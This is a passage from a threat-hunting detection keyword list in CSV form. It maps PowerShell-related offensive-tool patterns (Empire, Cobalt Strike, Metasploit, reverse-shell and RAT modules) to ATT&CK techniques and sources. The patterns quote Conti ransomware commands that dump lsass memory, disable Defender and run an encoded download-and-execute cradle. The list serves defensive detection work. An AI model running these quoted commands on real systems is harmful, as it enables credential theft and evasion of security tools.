SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #14","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell*Uninstall-WindowsFeature -Name Windows-Defender-GUI*","greyware_tool_keyword","powershell","Windows Defender tampering technique ","T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","10","8","N/A","N/A","N/A","N/A" +"*Powershell.exe -windowstyle hidden -nop -ExecutionPolicy Bypass -Commmand *C:\Users\*\AppData\Roaming\*","greyware_tool_keyword","powershell","Adversaries may attempt to execute powershell script from known accessible location","T1059.001 - T1036 - T1216","TA0002 - TA0006","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell.exe -exec bypass -noni -nop -w 1 -C*","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","High risk of false positive","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*powershell.exe -noni -nop -w 1 -enc *","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","High risk of false positive","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #8","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell.exe -noninteractive -executionpolicy bypass ps lsass*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #11","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell.exe -noninteractive -executionpolicy bypass quser*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #10","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell.exe -noninteractive -executionpolicy bypass rundll32.exe C:\windows\System32\comsvcs.dll* MiniDump * C:\programdata\a.zip full*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #13","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell.exe -noninteractive -executionpolicy bypass Start-Process c:\windows\SVN.exe -ArgumentList *-connect * -pass Password1234*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #12","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell.exe -NoP -sta -NonI -W Hidden -Command *Action = New-ScheduledTaskAction -Execute *","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*powershell_code_execution_invoke_assembly*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_collection_keylogger*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_collection_screenshot*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_command_x64.ps1*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*powershell_command_x86.ps1*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*powershell_credentials_tokens*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_encode_oneliner*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*powershell_encode_oneliner*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*powershell_encode_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*powershell_encode_stager*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*powershell_management_psinject*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_management_spawn*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*PowerShell_PoC.zip*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*powershell_privesc_bypassuac_eventvwr*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_privesc_sherlock*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_reverse_shell.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*powershell_reverse_tcp.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*powershell_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*powershell_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*powershell-admin-download-execute.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*PowershellAgentGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*PowershellAmsiGenerator*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*PowerShellArsenal*","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","9","828","224","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z" +"*PowerShellArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*PowershellCradleGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*PowerShellEmpire*","offensive_tool_keyword","empire","PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. many pentesters still struggle to integrate 